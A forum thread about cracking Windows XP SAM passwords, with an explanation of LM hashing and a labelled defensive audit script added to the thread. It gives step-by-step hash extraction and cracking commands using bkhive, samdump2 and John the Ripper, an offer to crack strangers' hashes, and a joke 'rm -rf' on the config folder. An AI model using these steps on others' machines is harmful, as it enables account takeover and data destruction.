
Thread: Help with cracking windows xp password

  1. #1
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    9

    Help with cracking windows xp password

    I have the entire contents of the windows/system32/config/ folder on a flash drive. I watched the tutorial and it didn't help much. Can anyone help? Thanks!

  2. #2
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    2


    Hi,

    rm -rf /windows/system32/config/

    BC

  3. #3
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    5


    This is for testing purposes only on our local domain. Replace as necessary.

    For you, mount /mnt/*usb*
    cd *usb*

    run samdump2 and dump it to /*usb*

    brute it or rainbow it.

    If you copied/pasted the system32 folder to a flash drive it won't work, FYI.

  4. #4
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    9


    What if I copied the system32\config\ folder with the Auditor live CD? I didn't do it through Windows, if that makes a difference.

  5. #5
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    9


    Where are the rainbow tables located when I install BackTrack on my HDD? Thanks

  6. #6
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    22


    I tried the WinXP passwd crack for fun and got some output I don't really understand.

    With john -show hashes.txt it said that one of 8 hashes has been cracked:
    Administrator ??????E58...

    can someone enlighten me please?

  7. #7
    xatar
    Guest

    Windows password cracking.

    Hi all,

    To explain kirmet's question: the Windows password is stored in the SAM database (local Windows accounts, not domain!) with the LAN Manager hashing algorithm as well as the newer NTLM hashing algorithm.

    The LM hash is old; it was used for Windows 3.1, 95, 98 etc. You do not need it anymore; in fact I would advise that you switch it off with either a registry change or through local security policies.

    The LM hash is insecure because it takes your password and immediately converts it to UPPERCASE. This removes any case sensitivity you had. It then splits your password into two 7-character passwords, padding out the second to make 7 characters, e.g.

    PaSshave58
    PASSHAVE58
    PASSHAV
    E58

    It then hashes (one-way encryption) the two passwords separately...

    PASSHAV = 7713c9168576a5ff
    e58 = 194db5b7f19c8340

    It then concatenates them...

    7713c9168576a5ff194db5b7f19c8340

    And that is stored in the SAM database along with the NTLM hash...

    8cacb1edb77fc056c50315feda39c8d6

    The NTLM hash is stronger as it hashes the password with case sensitivity and can accept up to 254 characters (I think!).

    Now that the revision is out of the way, to answer your question...

    John The Ripper has broken the second half of the LM hash - e58 and not the first. Did you do a brute force attack or a dictionary attack? The advantage of doing a dictionary attack is that it is very quick, just a couple of minutes to get through a decent sized dictionary, but the password HAS to exist in the dictionary file. The advantage of a brute force is that you will get the password eventually, but it may take a long time.

    Now, the rest.

    In Back|Track (I'll show you the syntax with Back|Track instead of Auditor/Whax as it is the latest):

    First off, boot your Windows machine with the Back|Track CD.

    It should automatically mount the windows partition, if not...

    root@slax:/# mkdir /mnt/win
    root@slax:/# mount /dev/hda1 /mnt/win
    root@slax:/# cd /mnt/win/WINDOWS/System32/config
    root@slax:/# cp SAM /tmp
    root@slax:/# cp system /tmp

    That copies the two required files - SAM and system to the /tmp directory. Now you need to prepare the dictionary file.

    root@slax:/# cd /pentest/password/dictionaries/
    root@slax:/# gunzip -c wordlist.txt.Z > /tmp/wordlist.txt
    root@slax:/# cd /tmp

    Now you need to decrypt the SAM file...

    root@slax:/# bkhive system key

    Now extract the SAM file contents to a text file.

    root@slax:/# samdump2 SAM key > hashes.txt

    Now run John to break the passwords.

    root@slax:/# john -w=wordlist.txt hashes.txt

    By default it attacks the LM hash, but you can force it to the NTLM hash.

    root@slax:/# john -w=wordlist.txt -f=NT hashes.txt

    If the password appears in the dictionary file, then john will crack it quickly. If not, then you will have to carry out a brute force attack. (Rainbow tables are another very effective option, but Back|Track does not have any tables inbuilt as they are HUGE!)

    I have made a shockwave flash tutorial on local windows password cracking with Back|Track, but have nowhere to put it for people to download.

    Hope this helps you.
    xatar.

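A worked version of the LM preparation xatar describes (upper-case, split into two 7-byte halves, pad the second), followed by a small audit of samdump2/pwdump-style output from a hardening angle: which accounts still have an LM hash stored (the thing xatar advises switching off), which of those are provably 7 characters or shorter, and which have a blank password. This is an added example, not code from the thread, from BackTrack, samdump2 or John the Ripper. It assumes the record layout user:rid:lmhash:nthash::: and handles only ASCII passwords; the sample dump lines are constructed, reusing the thread's example hashes for Administrator, while the helpdesk and svc_backup accounts and their NT hashes are invented placeholders.

```python
"""LM hash preparation and a samdump2-output audit (added example; not from
the thread, BackTrack, samdump2 or John the Ripper)."""
from typing import Dict, List, Optional, Tuple

# Constants Windows stores when no LM hash exists / the NT password is empty.
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Either half of BLANK_LM: the hash of an empty (all-NUL) 7-byte half.
BLANK_LM_HALF = BLANK_LM[:16]


def lm_preprocess(password: str) -> Optional[Tuple[bytes, bytes]]:
    """The preparation step xatar describes, before any DES is applied:
    upper-case, cut into two 7-byte halves, NUL-pad the second.
    Windows does not LM-hash passwords longer than 14 characters (it stores
    BLANK_LM instead), so those return None.  Only ASCII is handled here
    (assumption: real LM works on the OEM code page)."""
    if len(password) > 14:
        return None
    padded = password.upper().encode("ascii").ljust(14, b"\x00")
    return padded[:7], padded[7:]


def lm_half_keyspace(charset_size: int = 69) -> int:
    """Candidates per 7-byte half. The 95 printable ASCII characters collapse
    to 69 once lower-case letters fold into upper-case, and the two halves are
    attacked independently, which is why a 14-character LM password costs
    about 2 * 69**7 guesses rather than 95**14."""
    return charset_size ** 7


def parse_pwdump(lines: List[str]) -> List[Dict[str, str]]:
    """Parse samdump2 / pwdump style records: user:rid:lmhash:nthash:::"""
    entries = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed record: {line!r}")
        entries.append({
            "user": parts[0],
            "rid": parts[1],
            "lm": parts[2].lower(),
            "nt": parts[3].lower(),
        })
    return entries


def audit(entries: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Report, per account, the weaknesses xatar's explanation implies."""
    findings: Dict[str, List[str]] = {}
    for e in entries:
        issues = []
        if e["lm"] != BLANK_LM:
            # Disabling LM storage (NoLMHash) only takes effect on the next
            # password change, hence the second half of the advice.
            issues.append("LM hash stored: disable LM hash storage "
                          "(NoLMHash policy), then change the password")
            if e["lm"][16:] == BLANK_LM_HALF:
                # Second half hashes an all-NUL block: password is <= 7 chars.
                issues.append("password is 7 characters or shorter")
        if e["nt"] == BLANK_NT:
            issues.append("blank password")
        findings[e["user"]] = issues
    return findings


# Constructed sample dump. Administrator reuses the hashes from xatar's post;
# helpdesk and svc_backup, and their NT hashes, are invented placeholders.
SAMPLE_DUMP = [
    "Administrator:500:7713c9168576a5ff194db5b7f19c8340:8cacb1edb77fc056c50315feda39c8d6:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "helpdesk:1001:7713c9168576a5ffaad3b435b51404ee:00112233445566778899aabbccddeeff:::",
    "svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::",
]

if __name__ == "__main__":
    print(lm_preprocess("PaSshave58"))   # (b'PASSHAV', b'E58\x00\x00\x00\x00')
    print(lm_half_keyspace())
    for user, issues in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{user}: {'; '.join(issues) or 'ok'}")
```

The 7-characters-or-shorter check is the defender's reading of xatar's point about the second half: if the second 16 hex digits of a stored LM hash equal the second half of the blank constant, the second block was all padding, so nothing about the password beyond its first seven characters ever reached the hash.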
  8. #8
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    22


    *two thumbs up for that awesome explanation*

    Well I did a dictionary attack first and a brute force after that - the E58 part was broken with the dictionary attack - but I stopped the brute force after some time.

    So (sorry but I can't remember exactly what the output said) when it said something like
    .
    ...testing key ASAMDDR - ASAEERR
    .

    the algorithm tries to crack the first and the second 7-char set of the passwd?

    cheerz

  9. #9
    xatar
    Guest


    Hi,

    Glad you liked my explanation. I teach pen testing for a living so I should be able to explain it!! ;-)

    That message at the end of John basically tells you that it is running through the possible combinations of the passwords.

    Do you still want to crack the password? If you post it, I'll crack it with rainbow tables. Preferably post the samdump2 output.

    You should be able to run through all the possible combinations in about 3 days for a brute force attack against an LM hash.

    later,
    xatar.

  10. #10
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    1


    Hi, I tried this on my machine (Dell XPS Gen2) and when I got to the command line # samdump2 SAM key > hashes.txt it came up with:

    No password for user Administrator (500)
    No password for user Guest (501)

    I carried on with the rest of the commands with the result of:

    No password hashes loaded

    I was wondering why mine is not doing what it is meant to.
    Other than that thanks for the great tutorial.
